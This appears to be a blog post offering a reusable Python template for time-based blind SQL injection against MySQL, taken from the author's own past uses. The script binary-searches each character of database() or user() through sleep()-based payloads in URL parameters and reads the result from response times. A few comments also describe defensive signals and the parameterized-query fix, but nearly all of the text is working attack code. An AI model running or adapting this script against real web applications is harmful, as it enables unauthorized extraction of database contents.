mysql盲注模板

几次mysql盲注中抽出来的盲注模板

import requests
import time
# Time-based blind SQL injection template (kept verbatim from the post).
# It recovers one character of the injected expression at a time by binary
# searching its ASCII value and reading the answer from response latency:
# a slow reply means the sleep() branch of the if() ran. From a defender's
# view the traffic is very regular: ~8 sequential GETs per character, each
# repeated three times, a `sleep(` literal and `/**/` comment spacing in the
# query string, and latencies clustering just above time_conf seconds. Those
# are the signals for WAF rules and server-side request logging; the root
# cause is string-built SQL, which parameterized queries remove entirely.
time_conf = 1  # requested sleep() delay in seconds; also the latency threshold used below
results = ""  # characters recovered so far, in position order
for i in range(1, 40):  # position of the character being recovered (1-based, as substr() expects)
    min_char_index = 1  # lower bound of the current ASCII search range
    large_char_index = 250  # upper bound of the current ASCII search range
    fount = False  # assigned but never read anywhere in this script
    current_char = ""
    print("当前判断位数 ", i)
    while True:  # binary search over the ASCII range
        print("间距 ", min_char_index, large_char_index)
        medium_char_index = int((min_char_index + large_char_index)/2)  # midpoint of the current range
        # Each probe is sent three times and the latencies averaged to smooth
        # out network jitter before comparing against time_conf.
        running_time = 0
        for _num in range(3):
            url = f"https://example.com?userId=130" \
                  f"/**/or/**/1=1/**/and/**/" \
                  f"if((ascii(substr(database(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1=2)" \
                  f"&phone=18888888888"  # author's note: this backend cut calls off after ~1 s, so the if() delays at most a little over one second; %3e is a URL-encoded '>'
            # url = f"https://example.com?pageNo=1&pageSize=5&orderBy=desc," \
            #       f"(select*from(select+sleep(" \
            #       f"if((ascii(substr(user(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1)" \
            #       f")union/**/select+1)a)"
            start_time = time.time()
            rep = requests.get(url)  # the response body is never inspected; only the elapsed time carries information
            running_time += (time.time() - start_time)
        running_time = running_time/3  # mean latency over the three probes
        if large_char_index - min_char_index == 1:
            # Range has collapsed to two adjacent values: pick the one consistent
            # with the latest timing and stop searching this position.
            current_char = ""
            if running_time >= time_conf:
                current_char = chr(large_char_index)
            else:
                current_char = chr(min_char_index)
            break
        if running_time > time_conf:  # slow reply => the '>' condition held => character lies above the midpoint
            min_char_index = medium_char_index
        else:
            large_char_index = medium_char_index
    print("字符=>", current_char, "  ASCII=>", ord(current_char))
    if ord(current_char) == 1 or ord(current_char) == 250:  # landing on a search bound is treated as "past the end of the value"
        break
    results += current_char
    print("当前结果=>", results)
print("结果=>", results)